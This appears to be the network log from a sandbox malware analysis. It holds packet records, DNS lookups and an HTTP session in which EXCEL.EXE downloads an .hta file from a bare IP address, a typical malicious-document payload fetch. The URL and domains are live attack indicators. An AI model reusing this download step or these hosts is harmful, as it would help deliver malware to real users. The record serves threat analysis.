                                                              Mar 12, 2025 18:30:47.564255953 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.564273119 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.564323902 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.564331055 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.564359903 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.564373970 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.575630903 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.575653076 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.575700045 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.575706959 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.575727940 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.575742006 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.591356993 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.591377974 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.591440916 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.591451883 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.591490030 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.604192019 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.604218960 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.604296923 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.604330063 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.604353905 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.604382038 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.614926100 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.614943981 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.615012884 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.615022898 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.615278959 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.632750034 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.632767916 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.632838011 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.632843971 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.633085012 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.646204948 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.646220922 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.646337032 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.646344900 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.646388054 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.648848057 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.648871899 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.648920059 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.648926020 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.649008036 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.651195049 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.651212931 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.651299000 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.651305914 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.651371002 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.662585974 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.662600994 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.662669897 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.662677050 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.662825108 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.678307056 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.678323984 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.678365946 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.678371906 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.678402901 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.678427935 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.692641973 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.692658901 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.692719936 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.692725897 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.692771912 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.724747896 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.724770069 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.724833965 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.724839926 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.724870920 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.724891901 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.778206110 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.778227091 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.778274059 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.778283119 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.778310061 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.778331041 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.780340910 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.780361891 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.780430079 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.780436993 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.780514002 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.781013966 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.781030893 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.781076908 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.781083107 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.781110048 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.781148911 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.781446934 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.781461954 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.781519890 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.781526089 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.781687021 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.783381939 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.783390045 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.783446074 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.783452034 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.783498049 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.784445047 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.784461021 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.784508944 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.784516096 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.784621954 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.788455009 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.788469076 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.788515091 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.788521051 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.788573027 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.830846071 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.830866098 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.830919027 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.830934048 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.830964088 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.831001043 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.865087986 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.865107059 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.865154028 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.865159988 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.865199089 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.865220070 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.867325068 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.867341042 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.867393970 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.867399931 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.867554903 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.867873907 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.867889881 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.867943048 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.867947102 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.867996931 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.868397951 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.868413925 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.868453979 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.868459940 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.868479013 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.868508101 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.869352102 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.869374037 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.869414091 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.869420052 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.869441986 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.869563103 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.871354103 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.871368885 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.871423960 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.871429920 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.871650934 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.876322031 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.876339912 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.876398087 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.876404047 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.876463890 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.917682886 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.917701960 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.917752028 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.917756081 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.917808056 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.954205990 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.954224110 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.954297066 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.954307079 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.954360962 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.954379082 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.954509020 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.954524994 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.954576969 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.954582930 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.954610109 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.954624891 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.955060005 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.955073118 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.955161095 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.955173016 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.955243111 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.955279112 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.955312967 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.955319881 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.955331087 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.955363035 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.956198931 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.956213951 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.956276894 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.956284046 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.956429958 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.958518028 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.958533049 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.958606005 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.958612919 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.958652973 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.958673000 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.964055061 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.964068890 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.964137077 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:47.964143038 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:47.964257002 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.005089045 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.005105972 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.005170107 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.005176067 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.005214930 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.041290045 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041304111 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041378021 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.041384935 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041569948 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.041587114 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041601896 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041655064 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.041661024 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041708946 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.041980982 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.041996002 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.042056084 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.042063951 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.042109013 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.042423964 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.042443037 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.042495966 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.042501926 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.042752028 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.043490887 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.043507099 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.043559074 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.043565035 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.043667078 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.045542955 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.045557976 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.045618057 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.045624018 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.045732975 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.050442934 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.050461054 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.050510883 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.050515890 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.050551891 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.050570965 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.091991901 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.092008114 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.092037916 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.092094898 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.092108965 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.092169046 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.092623949 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.092637062 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:48.092648029 CET49705443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:48.092653990 CET4434970513.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:53.045646906 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:53.045672894 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:53.045811892 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:53.046103001 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:53.046113968 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:53.048029900 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:53.048072100 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:53.048132896 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:53.048278093 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:53.048297882 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:55.339823008 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:55.340503931 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:55.340523958 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:55.341526031 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:55.341531038 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:55.428774118 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:55.429382086 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:55.429402113 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:55.430238962 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:55.430246115 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.847804070 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.847831964 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.847882986 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.848124981 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:56.848412991 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:56.848436117 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.848478079 CET49706443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:56.848484993 CET4434970613.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.849409103 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.849551916 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.850198984 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:56.850446939 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:56.850466967 CET4434970713.107.246.67192.168.2.10
                                                              Mar 12, 2025 18:30:56.850477934 CET49707443192.168.2.1013.107.246.67
                                                              Mar 12, 2025 18:30:56.850485086 CET4434970713.107.246.67192.168.2.10
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 12, 2025 18:30:24.279448032 CET5757853192.168.2.101.1.1.1
                                                              Mar 12, 2025 18:30:24.303360939 CET53575781.1.1.1192.168.2.10
                                                              Mar 12, 2025 18:30:27.715646029 CET5531053192.168.2.101.1.1.1
                                                              Mar 12, 2025 18:30:27.746228933 CET53553101.1.1.1192.168.2.10
                                                              Mar 12, 2025 18:30:39.562165022 CET4936253192.168.2.101.1.1.1
                                                              Mar 12, 2025 18:30:39.569680929 CET53493621.1.1.1192.168.2.10
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 12, 2025 18:30:24.279448032 CET192.168.2.101.1.1.10xf27dStandard query (0)arnogo.netA (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:27.715646029 CET192.168.2.101.1.1.10x6d68Standard query (0)link.saja.marketA (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:39.562165022 CET192.168.2.101.1.1.10x7cc4Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Mar 12, 2025 18:29:37.307145119 CET1.1.1.1192.168.2.100xc9abNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:29:37.307145119 CET1.1.1.1192.168.2.100xc9abNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:29:37.307145119 CET1.1.1.1192.168.2.100xc9abNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:29:41.846261024 CET1.1.1.1192.168.2.100x712aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:29:41.846261024 CET1.1.1.1192.168.2.100x712aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:24.303360939 CET1.1.1.1192.168.2.100xf27dNo error (0)arnogo.net104.21.68.120A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:24.303360939 CET1.1.1.1192.168.2.100xf27dNo error (0)arnogo.net172.67.195.85A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:27.746228933 CET1.1.1.1192.168.2.100x6d68No error (0)link.saja.marketistio.saja.marketCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:30:27.746228933 CET1.1.1.1192.168.2.100x6d68No error (0)istio.saja.marketservice-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:30:27.746228933 CET1.1.1.1192.168.2.100x6d68No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.89.152A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:27.746228933 CET1.1.1.1192.168.2.100x6d68No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.153.44A (IP address)IN (0x0001)false
                                                              Mar 12, 2025 18:30:39.569680929 CET1.1.1.1192.168.2.100x7cc4No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:30:39.569680929 CET1.1.1.1192.168.2.100x7cc4No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:30:39.569680929 CET1.1.1.1192.168.2.100x7cc4No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:30:39.569680929 CET1.1.1.1192.168.2.100x7cc4No error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Mar 12, 2025 18:30:39.569680929 CET1.1.1.1192.168.2.100x7cc4No error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                                              • arnogo.net
                                                              • link.saja.market
                                                              • otelrules.svc.static.microsoft
                                                              • 104.168.7.38
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1049703104.168.7.38807116C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              Mar 12, 2025 18:30:30.993944883 CET257OUTGET /xampp/kscc/scc/everynicepersonwalkingentireplacesgoodformegreat.hta HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Host: 104.168.7.38
                                                              Mar 12, 2025 18:30:31.488995075 CET1236INHTTP/1.1 200 OK
                                                              Date: Wed, 12 Mar 2025 17:30:30 GMT
